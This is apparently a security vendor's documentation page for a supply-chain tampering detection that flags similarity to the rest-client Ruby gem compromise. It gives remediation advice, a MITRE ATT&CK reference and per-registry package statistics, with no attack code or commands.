TH20111
Detected indicators of tampering that resemble the rest-client software compromise.
| priority | CI/CD status | severity | effort | SAFE level | SAFE assessment |
|---|---|---|---|---|---|
 | fail | high | high | 1 | tampering: fail Reason: indicators of tampering found |
About the issueβ
Publicly disclosed software supply chain compromises can be modeled through their unique set of indicators of tampering. These indicators form a heuristic signature that evaluates during differential analysis, ensuring no similar supply chain attack has affected a software package. Through inspection of changes in behaviors over subsequent versions, a match was made with the indicators of tampering that resemble the rest-client software compromise. Malicious actors are known to re-use the attack patterns that were successful in the past. Some malicious actors are also known to emulate other attackers with the intent to misdirect incident responders. Therefore, having a positive tampering match is not sufficient for attack attribution. It is highly likely that the software package was tampered with by a malicious actor or a rogue insider.
How to resolve the issueβ
- Investigate reported detections.
- Consult Mitre ATT&CK documentation: T1195.001 - Compromise Software Dependencies and Development Tools.
- Investigate your build and release environment for software supply chain compromise.
- Consider hiring an external incident response team to assist with finding the root cause of the compromise.
- You should delay the software release until the investigation is completed, and the detection is verified.
Incidence statisticsβ
ReversingLabs periodically collects and analyzes the contents of popular software package repositories for threat research purposes. Analysis results are used to calculate incidence statistics for issues (policy violations) that Spectra Assure can detect in software packages.
This section is updated when new data becomes available.
Total amount of packages analyzed
- RubyGems: 183K
- Nuget: 644K
- PyPi: 628K
- NPM: 3.72M
Recommended readingβ
- T1195.001 - Compromise Software Dependencies and Development Tools (External resource - Mitre ATT&CK documentation)
- Backdoor Found in βrest-clientβ Ruby Gem (External resource - SecurityWeek)